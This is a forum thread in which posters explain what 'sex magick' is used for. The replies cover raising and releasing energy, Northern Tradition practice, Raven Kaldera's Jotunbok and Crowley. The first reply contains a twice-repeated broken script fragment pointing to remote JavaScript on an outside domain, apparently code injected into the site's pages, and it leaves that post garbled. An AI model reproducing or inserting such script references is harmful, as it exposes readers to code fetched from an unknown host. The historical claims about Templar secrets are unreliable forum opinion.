What is sex magick for?

I've studied a broad range of topics, but sometimes, stuff just just stick or make sense.
I'm very curious as to what sex magick is used for. I would guess for fertility, but beyond that, I am unsure.

In most forms of magick, one must raise power and once it is built up, released all at once. Some induce this state through dance, drumming, chant, and others through masturbation or sex. As you can guess, one must remain focused on the goal throughout the entire process for it to manifest properly. Very good focus must be consistent. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I'm not sure about its use in other practices, but like White said- in Northern Tradition the purpose of sex magick is to raise and build energy/ then use that energy for some kind of purpose (generally ritual work). Since you've begun reading Raven Kaldera, you might find his book Jotunbok to be helpful as it includes a section about sex magick in this path.

The "magic" of sex is the "bringing together" of the male and female of Nature. It is why many practise "skyclad"; to be closer to Nature. (Strictly speaking, clothing is artificial!). Look up Alister Crowley on Sex magick. Its been a while since i read about it, but Alister maintained that sex magick is powerful and a secret guarded by the Knights Templar, as well as going back to Egypt.
